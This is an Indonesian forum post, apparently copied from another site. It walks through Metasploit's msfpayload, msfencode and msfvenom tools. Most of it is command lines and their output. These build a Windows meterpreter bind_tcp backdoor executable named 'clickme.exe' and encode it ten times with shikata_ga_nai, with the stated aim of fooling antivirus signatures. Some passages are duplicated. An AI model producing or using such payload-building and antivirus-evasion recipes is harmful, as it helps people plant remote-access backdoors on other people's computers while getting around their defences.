12-19-2015, 11:43 PM
Metasploit Framework: ‘msfvenom’
Shared Posted dari web tetangga "jika sudah ada silhkan di hpus... silahkan cek di halaman
Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut:
1. 1 msfpayload ( Versi sebelumnya )
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {}
[*]x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*]x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*]x86/shikata_ga_nai succeeded with size 379 (iteration=3)
[*]x86/shikata_ga_nai succeeded with size 406 (iteration=4)
[*]x86/shikata_ga_nai succeeded with size 433 (iteration=5)
[*]x86/shikata_ga_nai succeeded with size 460 (iteration=6)
[*]x86/shikata_ga_nai succeeded with size 487 (iteration=7)
[*]x86/shikata_ga_nai succeeded with size 514 (iteration=8)
[*]x86/shikata_ga_nai succeeded with size 541 (iteration=9)
[*]x86/shikata_ga_nai succeeded with size 568 (iteration=10)
[*]
2.0 msfvenom ( Versi Kali linux 2.-)
Shared Posted dari web tetangga "jika sudah ada silhkan di hpus... silahkan cek di halaman
Sekedar mengingatkan fungsi ‘msfpayload’ adalah seperti berikut:
1. 1 msfpayload ( Versi sebelumnya )
Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp X > /tmp/clickme.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/bind_tcp
Length: 298
Options: {}
Command diatas akan menghasilkan file binary windows executable (exe). Payload file tersebut adalah sebuah meterpreter metasploit yang akan terhubung ke attacker menggunakan bind TCP. Karena LPORT tidak saya definisikan di sana, jadi LPORT default adalah port 4444. Jadilah file ini, kemudian coba di klik… hyahh.. ada warning antivirus
Virus Warning
Untuk itulah digunakan msfencode yang akan melakukan encode byte demi byte payload sehingga diharapkan bisa mengecoh signature antivirus
1.2 msfencode ( Versi sebelumnya )
1.2 msfencode ( Versi sebelumnya )
Command untuk meng-encode payload dan keluarannya di /tmp/clickme.exe
Quote:root@eniac:/opt/framework-3.7.0/msf3# ./msfpayload windows/meterpreter/bind_tcp | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /tmp/clickme.exe
[*]x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*]x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*]x86/shikata_ga_nai succeeded with size 379 (iteration=3)
[*]x86/shikata_ga_nai succeeded with size 406 (iteration=4)
[*]x86/shikata_ga_nai succeeded with size 433 (iteration=5)
[*]x86/shikata_ga_nai succeeded with size 460 (iteration=6)
[*]x86/shikata_ga_nai succeeded with size 487 (iteration=7)
[*]x86/shikata_ga_nai succeeded with size 514 (iteration=8)
[*]x86/shikata_ga_nai succeeded with size 541 (iteration=9)
[*]x86/shikata_ga_nai succeeded with size 568 (iteration=10)
Proses encode menggunakan tipe x86/shikata_ga_nai dengan iterasi sebanyak 10 kali encode.
Sedangkan jika menggunakan command msfvenom, cukup satu perintah saja (perhatikan, perintah di atas ‘kan dua perintah yang dipisah ‘pipe’ atau tanda | ) tapi ‘msfvenom’ hanya seperti ini:
[*]
2.0 msfvenom ( Versi Kali linux 2.-)
Quote:./msfvenom -p windows/meterpreter/bind_tcp -f exe -e -i 3 -s 480 RHOST=10.5.253.213 >> /tmp/clickme.exe
selesai
#maaf jika kurng jelas "post 1
#maaf jika kurng jelas "post 1
Quote:root@admin :~#exploit~firewall~defensif
< BELAJAR UNTUK BERBAGI >